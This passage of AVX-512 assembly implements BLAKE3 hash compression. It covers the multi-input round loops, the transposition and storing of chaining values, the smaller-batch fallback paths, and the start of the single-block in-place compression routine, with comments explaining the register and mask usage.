vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm23
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm16
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm18
vpaddd ymm1, ymm1, ymm19
vpaddd ymm2, ymm2, ymm17
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm25
vpaddd ymm1, ymm1, ymm27
vpaddd ymm2, ymm2, ymm24
vpaddd ymm3, ymm3, ymm31
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm30
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm28
vpaddd ymm3, ymm3, ymm17
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm29
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm18
vpaddd ymm3, ymm3, ymm20
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm19
vpaddd ymm1, ymm1, ymm26
vpaddd ymm2, ymm2, ymm22
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
vpaddd ymm0, ymm0, ymm27
vpaddd ymm1, ymm1, ymm21
vpaddd ymm2, ymm2, ymm17
vpaddd ymm3, ymm3, ymm24
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vprord ymm15, ymm15, 16
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 12
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vpaddd ymm0, ymm0, ymm31
vpaddd ymm1, ymm1, ymm16
vpaddd ymm2, ymm2, ymm25
vpaddd ymm3, ymm3, ymm22
vpaddd ymm0, ymm0, ymm4
vpaddd ymm1, ymm1, ymm5
vpaddd ymm2, ymm2, ymm6
vpaddd ymm3, ymm3, ymm7
vpxord ymm12, ymm12, ymm0
vpxord ymm13, ymm13, ymm1
vpxord ymm14, ymm14, ymm2
vpxord ymm15, ymm15, ymm3
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vprord ymm15, ymm15, 8
vpaddd ymm8, ymm8, ymm12
vpaddd ymm9, ymm9, ymm13
vpaddd ymm10, ymm10, ymm14
vpaddd ymm11, ymm11, ymm15
vpxord ymm4, ymm4, ymm8
vpxord ymm5, ymm5, ymm9
vpxord ymm6, ymm6, ymm10
vpxord ymm7, ymm7, ymm11
vprord ymm4, ymm4, 7
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vpaddd ymm0, ymm0, ymm30
vpaddd ymm1, ymm1, ymm18
vpaddd ymm2, ymm2, ymm19
vpaddd ymm3, ymm3, ymm23
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 16
vprord ymm12, ymm12, 16
vprord ymm13, ymm13, 16
vprord ymm14, ymm14, 16
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 12
vprord ymm6, ymm6, 12
vprord ymm7, ymm7, 12
vprord ymm4, ymm4, 12
vpaddd ymm0, ymm0, ymm26
vpaddd ymm1, ymm1, ymm28
vpaddd ymm2, ymm2, ymm20
vpaddd ymm3, ymm3, ymm29
vpaddd ymm0, ymm0, ymm5
vpaddd ymm1, ymm1, ymm6
vpaddd ymm2, ymm2, ymm7
vpaddd ymm3, ymm3, ymm4
vpxord ymm15, ymm15, ymm0
vpxord ymm12, ymm12, ymm1
vpxord ymm13, ymm13, ymm2
vpxord ymm14, ymm14, ymm3
vprord ymm15, ymm15, 8
vprord ymm12, ymm12, 8
vprord ymm13, ymm13, 8
vprord ymm14, ymm14, 8
vpaddd ymm10, ymm10, ymm15
vpaddd ymm11, ymm11, ymm12
vpaddd ymm8, ymm8, ymm13
vpaddd ymm9, ymm9, ymm14
vpxord ymm5, ymm5, ymm10
vpxord ymm6, ymm6, ymm11
vpxord ymm7, ymm7, ymm8
vpxord ymm4, ymm4, ymm9
vprord ymm5, ymm5, 7
vprord ymm6, ymm6, 7
vprord ymm7, ymm7, 7
vprord ymm4, ymm4, 7
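// End of round 7: feed forward by XORing the two state halves to form
// the eight chaining-value words for all eight lanes.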
vpxor ymm0, ymm0, ymm8
vpxor ymm1, ymm1, ymm9
vpxor ymm2, ymm2, ymm10
vpxor ymm3, ymm3, ymm11
vpxor ymm4, ymm4, ymm12
vpxor ymm5, ymm5, ymm13
vpxor ymm6, ymm6, ymm14
vpxor ymm7, ymm7, ymm15
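// Reload the base flags for the next block; the branch below still tests
// the earlier cmp rdx, r15, since neither movzx nor the vector
// instructions above modify RFLAGS.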
movzx eax, byte ptr [rbp+0x38]
jne 2b
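// All blocks of the current 8 inputs are compressed: transpose the eight
// 32-byte chaining values out of ymm0-ymm7 and store them contiguously.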
mov rbx, qword ptr [rbp+0x50]
vunpcklps ymm8, ymm0, ymm1
vunpcklps ymm9, ymm2, ymm3
vunpckhps ymm10, ymm0, ymm1
vunpcklps ymm11, ymm4, ymm5
vunpcklps ymm0, ymm6, ymm7
vshufps ymm12, ymm8, ymm9, 78
vblendps ymm1, ymm8, ymm12, 0xCC
vshufps ymm8, ymm11, ymm0, 78
vunpckhps ymm13, ymm2, ymm3
vblendps ymm2, ymm11, ymm8, 0xCC
vblendps ymm3, ymm12, ymm9, 0xCC
vperm2f128 ymm12, ymm1, ymm2, 0x20
vmovups ymmword ptr [rbx], ymm12
vunpckhps ymm14, ymm4, ymm5
vblendps ymm4, ymm8, ymm0, 0xCC
vunpckhps ymm15, ymm6, ymm7
vperm2f128 ymm7, ymm3, ymm4, 0x20
vmovups ymmword ptr [rbx+0x20], ymm7
vshufps ymm5, ymm10, ymm13, 78
vblendps ymm6, ymm5, ymm13, 0xCC
vshufps ymm13, ymm14, ymm15, 78
vblendps ymm10, ymm10, ymm5, 0xCC
vblendps ymm14, ymm14, ymm13, 0xCC
vperm2f128 ymm8, ymm10, ymm14, 0x20
vmovups ymmword ptr [rbx+0x40], ymm8
vblendps ymm15, ymm13, ymm15, 0xCC
vperm2f128 ymm13, ymm6, ymm15, 0x20
vmovups ymmword ptr [rbx+0x60], ymm13
vperm2f128 ymm9, ymm1, ymm2, 0x31
vperm2f128 ymm11, ymm3, ymm4, 0x31
vmovups ymmword ptr [rbx+0x80], ymm9
vperm2f128 ymm14, ymm10, ymm14, 0x31
vperm2f128 ymm15, ymm6, ymm15, 0x31
vmovups ymmword ptr [rbx+0xA0], ymm11
vmovups ymmword ptr [rbx+0xC0], ymm14
vmovups ymmword ptr [rbx+0xE0], ymm15
vmovdqa ymm0, ymmword ptr [rsp]
vmovdqa ymm2, ymmword ptr [rsp+0x2*0x20]
vmovdqa32 ymm0 {k1}, ymmword ptr [rsp+0x1*0x20]
vmovdqa32 ymm2 {k1}, ymmword ptr [rsp+0x3*0x20]
vmovdqa ymmword ptr [rsp], ymm0
vmovdqa ymmword ptr [rsp+0x2*0x20], ymm2
add rbx, 256
mov qword ptr [rbp+0x50], rbx
add rdi, 64
sub rsi, 8
3:
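// Fewer than 8 inputs remain: reload the output pointer, the per-input
// byte count, and the flag bytes, then fall through the 4-, 2- and
// 1-input paths below, each keeping one input per 128-bit lane.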
mov rbx, qword ptr [rbp+0x50]
mov r15, qword ptr [rsp+0x80]
movzx r13, byte ptr [rbp+0x38]
movzx r12, byte ptr [rbp+0x48]
test esi, 0x4
je 3f
vbroadcasti32x4 zmm0, xmmword ptr [rcx]
vbroadcasti32x4 zmm1, xmmword ptr [rcx+0x1*0x10]
vmovdqa xmm12, xmmword ptr [rsp]
vmovdqa xmm13, xmmword ptr [rsp+0x4*0x10]
vpunpckldq xmm14, xmm12, xmm13
vpunpckhdq xmm15, xmm12, xmm13
vpermq ymm14, ymm14, 0xDC
vpermq ymm15, ymm15, 0xDC
vpbroadcastd zmm12, dword ptr [BLAKE3_BLOCK_LEN+rip]
vinserti64x4 zmm13, zmm14, ymm15, 0x01
mov eax, 17476
kmovw k2, eax
vpblendmd zmm13 {k2}, zmm13, zmm12
vbroadcasti32x4 zmm15, xmmword ptr [BLAKE3_IV+rip]
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
mov r10, qword ptr [rdi+0x10]
mov r11, qword ptr [rdi+0x18]
mov eax, 43690
kmovw k3, eax
mov eax, 34952
kmovw k4, eax
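// Mask constants: k2 = 0x4444 selects the block-length dword in each
// 128-bit lane, k4 = 0x8888 the flags dword; k3 = 0xAAAA is used by the
// in-register message permutation below.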
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
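// Per-block flags: save eax, OR in the end flag from r12d, then undo it
// (cmovne) unless this is the final block (rdx has reached r15).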
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x88], eax
vmovdqa32 zmm2, zmm15
vpbroadcastd zmm8, dword ptr [rsp+0x88]
vpblendmd zmm3 {k4}, zmm13, zmm8
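// Gather the next 64-byte block from each of the 4 inputs and
// de-interleave it into the four message row vectors zmm4-zmm7
// (zmm6/zmm7 pre-rotated for the diagonal half-rounds).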
vmovups zmm8, zmmword ptr [r8+rdx-0x1*0x40]
vinserti32x4 zmm8, zmm8, xmmword ptr [r9+rdx-0x4*0x10], 0x01
vinserti32x4 zmm8, zmm8, xmmword ptr [r10+rdx-0x4*0x10], 0x02
vinserti32x4 zmm8, zmm8, xmmword ptr [r11+rdx-0x4*0x10], 0x03
vmovups zmm9, zmmword ptr [r8+rdx-0x30]
vinserti32x4 zmm9, zmm9, xmmword ptr [r9+rdx-0x3*0x10], 0x01
vinserti32x4 zmm9, zmm9, xmmword ptr [r10+rdx-0x3*0x10], 0x02
vinserti32x4 zmm9, zmm9, xmmword ptr [r11+rdx-0x3*0x10], 0x03
vshufps zmm4, zmm8, zmm9, 136
vshufps zmm5, zmm8, zmm9, 221
vmovups zmm8, zmmword ptr [r8+rdx-0x20]
vinserti32x4 zmm8, zmm8, xmmword ptr [r9+rdx-0x2*0x10], 0x01
vinserti32x4 zmm8, zmm8, xmmword ptr [r10+rdx-0x2*0x10], 0x02
vinserti32x4 zmm8, zmm8, xmmword ptr [r11+rdx-0x2*0x10], 0x03
vmovups zmm9, zmmword ptr [r8+rdx-0x10]
vinserti32x4 zmm9, zmm9, xmmword ptr [r9+rdx-0x1*0x10], 0x01
vinserti32x4 zmm9, zmm9, xmmword ptr [r10+rdx-0x1*0x10], 0x02
vinserti32x4 zmm9, zmm9, xmmword ptr [r11+rdx-0x1*0x10], 0x03
vshufps zmm6, zmm8, zmm9, 136
vshufps zmm7, zmm8, zmm9, 221
vpshufd zmm6, zmm6, 0x93
vpshufd zmm7, zmm7, 0x93
mov al, 7
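// al counts down the 7 rounds of the loop below; the message vectors are
// permuted in-register between rounds.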
9:
vpaddd zmm0, zmm0, zmm4
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 16
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 12
vpaddd zmm0, zmm0, zmm5
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 8
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 7
vpshufd zmm0, zmm0, 0x93
vpshufd zmm3, zmm3, 0x4E
vpshufd zmm2, zmm2, 0x39
vpaddd zmm0, zmm0, zmm6
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 16
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 12
vpaddd zmm0, zmm0, zmm7
vpaddd zmm0, zmm0, zmm1
vpxord zmm3, zmm3, zmm0
vprord zmm3, zmm3, 8
vpaddd zmm2, zmm2, zmm3
vpxord zmm1, zmm1, zmm2
vprord zmm1, zmm1, 7
vpshufd zmm0, zmm0, 0x39
vpshufd zmm3, zmm3, 0x4E
vpshufd zmm2, zmm2, 0x93
dec al
jz 9f
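// Not the last round: apply the BLAKE3 message permutation to
// zmm4-zmm7 so the next round reads the correctly scheduled words.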
vshufps zmm8, zmm4, zmm5, 214
vpshufd zmm9, zmm4, 0x0F
vpshufd zmm4, zmm8, 0x39
vshufps zmm8, zmm6, zmm7, 250
vpblendmd zmm9 {k3}, zmm9, zmm8
vpunpcklqdq zmm8, zmm7, zmm5
vpblendmd zmm8 {k4}, zmm8, zmm6
vpshufd zmm8, zmm8, 0x78
vpunpckhdq zmm5, zmm5, zmm7
vpunpckldq zmm6, zmm6, zmm5
vpshufd zmm7, zmm6, 0x1E
vmovdqa32 zmm5, zmm9
vmovdqa32 zmm6, zmm8
jmp 9b
9:
vpxord zmm0, zmm0, zmm2
vpxord zmm1, zmm1, zmm3
mov eax, r13d
cmp rdx, r15
jne 2b
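// Store the four 32-byte chaining values, one 128-bit lane per input.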
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vextracti32x4 xmmword ptr [rbx+0x4*0x10], zmm0, 0x02
vextracti32x4 xmmword ptr [rbx+0x5*0x10], zmm1, 0x02
vextracti32x4 xmmword ptr [rbx+0x6*0x10], zmm0, 0x03
vextracti32x4 xmmword ptr [rbx+0x7*0x10], zmm1, 0x03
vmovdqa xmm0, xmmword ptr [rsp]
vmovdqa xmm2, xmmword ptr [rsp+0x40]
vmovdqa32 xmm0 {k1}, xmmword ptr [rsp+0x1*0x10]
vmovdqa32 xmm2 {k1}, xmmword ptr [rsp+0x5*0x10]
vmovdqa xmmword ptr [rsp], xmm0
vmovdqa xmmword ptr [rsp+0x40], xmm2
add rbx, 128
add rdi, 32
sub rsi, 4
3:
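// 2-input path: one input per 128-bit lane of a ymm register.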
test esi, 0x2
je 3f
vbroadcasti128 ymm0, xmmword ptr [rcx]
vbroadcasti128 ymm1, xmmword ptr [rcx+0x10]
vmovd xmm13, dword ptr [rsp]
vpinsrd xmm13, xmm13, dword ptr [rsp+0x40], 1
vpinsrd xmm13, xmm13, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovd xmm14, dword ptr [rsp+0x4]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x44], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vinserti128 ymm13, ymm13, xmm14, 0x01
mov r8, qword ptr [rdi]
mov r9, qword ptr [rdi+0x8]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
mov dword ptr [rsp+0x88], eax
vbroadcasti128 ymm2, xmmword ptr [BLAKE3_IV+rip]
vpbroadcastd ymm8, dword ptr [rsp+0x88]
vpblendd ymm3, ymm13, ymm8, 0x88
vmovups ymm8, ymmword ptr [r8+rdx-0x40]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x40], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x30]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x30], 0x01
vshufps ymm4, ymm8, ymm9, 136
vshufps ymm5, ymm8, ymm9, 221
vmovups ymm8, ymmword ptr [r8+rdx-0x20]
vinsertf128 ymm8, ymm8, xmmword ptr [r9+rdx-0x20], 0x01
vmovups ymm9, ymmword ptr [r8+rdx-0x10]
vinsertf128 ymm9, ymm9, xmmword ptr [r9+rdx-0x10], 0x01
vshufps ymm6, ymm8, ymm9, 136
vshufps ymm7, ymm8, ymm9, 221
vpshufd ymm6, ymm6, 0x93
vpshufd ymm7, ymm7, 0x93
mov al, 7
9:
vpaddd ymm0, ymm0, ymm4
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 16
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 12
vpaddd ymm0, ymm0, ymm5
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 8
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 7
vpshufd ymm0, ymm0, 0x93
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x39
vpaddd ymm0, ymm0, ymm6
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 16
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 12
vpaddd ymm0, ymm0, ymm7
vpaddd ymm0, ymm0, ymm1
vpxord ymm3, ymm3, ymm0
vprord ymm3, ymm3, 8
vpaddd ymm2, ymm2, ymm3
vpxord ymm1, ymm1, ymm2
vprord ymm1, ymm1, 7
vpshufd ymm0, ymm0, 0x39
vpshufd ymm3, ymm3, 0x4E
vpshufd ymm2, ymm2, 0x93
dec al
jz 9f
vshufps ymm8, ymm4, ymm5, 214
vpshufd ymm9, ymm4, 0x0F
vpshufd ymm4, ymm8, 0x39
vshufps ymm8, ymm6, ymm7, 250
vpblendd ymm9, ymm9, ymm8, 0xAA
vpunpcklqdq ymm8, ymm7, ymm5
vpblendd ymm8, ymm8, ymm6, 0x88
vpshufd ymm8, ymm8, 0x78
vpunpckhdq ymm5, ymm5, ymm7
vpunpckldq ymm6, ymm6, ymm5
vpshufd ymm7, ymm6, 0x1E
vmovdqa ymm5, ymm9
vmovdqa ymm6, ymm8
jmp 9b
9:
vpxor ymm0, ymm0, ymm2
vpxor ymm1, ymm1, ymm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
vextracti128 xmmword ptr [rbx+0x20], ymm0, 0x01
vextracti128 xmmword ptr [rbx+0x30], ymm1, 0x01
vmovdqa xmm0, xmmword ptr [rsp]
vmovdqa xmm2, xmmword ptr [rsp+0x4*0x10]
vmovdqu32 xmm0 {k1}, xmmword ptr [rsp+0x8]
vmovdqu32 xmm2 {k1}, xmmword ptr [rsp+0x48]
vmovdqa xmmword ptr [rsp], xmm0
vmovdqa xmmword ptr [rsp+0x4*0x10], xmm2
add rbx, 64
add rdi, 16
sub rsi, 2
3:
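// Final single input, if any: plain 128-bit (xmm) compression.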
test esi, 0x1
je 4b
vmovdqu xmm0, xmmword ptr [rcx]
vmovdqu xmm1, xmmword ptr [rcx+0x10]
vmovd xmm14, dword ptr [rsp]
vpinsrd xmm14, xmm14, dword ptr [rsp+0x40], 1
vpinsrd xmm14, xmm14, dword ptr [BLAKE3_BLOCK_LEN+rip], 2
vmovdqa xmm15, xmmword ptr [BLAKE3_IV+rip]
mov r8, qword ptr [rdi]
movzx eax, byte ptr [rbp+0x40]
or eax, r13d
xor edx, edx
.p2align 5
2:
mov r14d, eax
or eax, r12d
add rdx, 64
cmp rdx, r15
cmovne eax, r14d
vpinsrd xmm3, xmm14, eax, 3
vmovdqa xmm2, xmm15
vmovups xmm8, xmmword ptr [r8+rdx-0x40]
vmovups xmm9, xmmword ptr [r8+rdx-0x30]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [r8+rdx-0x20]
vmovups xmm9, xmmword ptr [r8+rdx-0x10]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm5
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x93
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x39
vpaddd xmm0, xmm0, xmm6
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 12
vpaddd xmm0, xmm0, xmm7
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 8
vpaddd xmm2, xmm2, xmm3
vpxord xmm1, xmm1, xmm2
vprord xmm1, xmm1, 7
vpshufd xmm0, xmm0, 0x39
vpshufd xmm3, xmm3, 0x4E
vpshufd xmm2, xmm2, 0x93
dec al
jz 9f
vshufps xmm8, xmm4, xmm5, 214
vpshufd xmm9, xmm4, 0x0F
vpshufd xmm4, xmm8, 0x39
vshufps xmm8, xmm6, xmm7, 250
vpblendd xmm9, xmm9, xmm8, 0xAA
vpunpcklqdq xmm8, xmm7, xmm5
vpblendd xmm8, xmm8, xmm6, 0x88
vpshufd xmm8, xmm8, 0x78
vpunpckhdq xmm5, xmm5, xmm7
vpunpckldq xmm6, xmm6, xmm5
vpshufd xmm7, xmm6, 0x1E
vmovdqa xmm5, xmm9
vmovdqa xmm6, xmm8
jmp 9b
9:
vpxor xmm0, xmm0, xmm2
vpxor xmm1, xmm1, xmm3
mov eax, r13d
cmp rdx, r15
jne 2b
vmovdqu xmmword ptr [rbx], xmm0
vmovdqu xmmword ptr [rbx+0x10], xmm1
jmp 4b
.p2align 6
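// blake3_compress_in_place_avx512: single-block compression. Per the
// System V registers used below: rdi = 32-byte CV (updated in place),
// rsi = 64-byte block, dl = block length, rcx = 64-bit counter,
// r8b = flags.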
_blake3_compress_in_place_avx512:
blake3_compress_in_place_avx512:
_CET_ENDBR
vmovdqu xmm0, xmmword ptr [rdi]
vmovdqu xmm1, xmmword ptr [rdi+0x10]
movzx eax, r8b
movzx edx, dl
shl rax, 32
add rdx, rax
vmovq xmm3, rcx
vmovq xmm4, rdx
vpunpcklqdq xmm3, xmm3, xmm4
vmovaps xmm2, xmmword ptr [BLAKE3_IV+rip]
vmovups xmm8, xmmword ptr [rsi]
vmovups xmm9, xmmword ptr [rsi+0x10]
vshufps xmm4, xmm8, xmm9, 136
vshufps xmm5, xmm8, xmm9, 221
vmovups xmm8, xmmword ptr [rsi+0x20]
vmovups xmm9, xmmword ptr [rsi+0x30]
vshufps xmm6, xmm8, xmm9, 136
vshufps xmm7, xmm8, xmm9, 221
vpshufd xmm6, xmm6, 0x93
vpshufd xmm7, xmm7, 0x93
mov al, 7
9:
vpaddd xmm0, xmm0, xmm4
vpaddd xmm0, xmm0, xmm1
vpxord xmm3, xmm3, xmm0
vprord xmm3, xmm3, 16
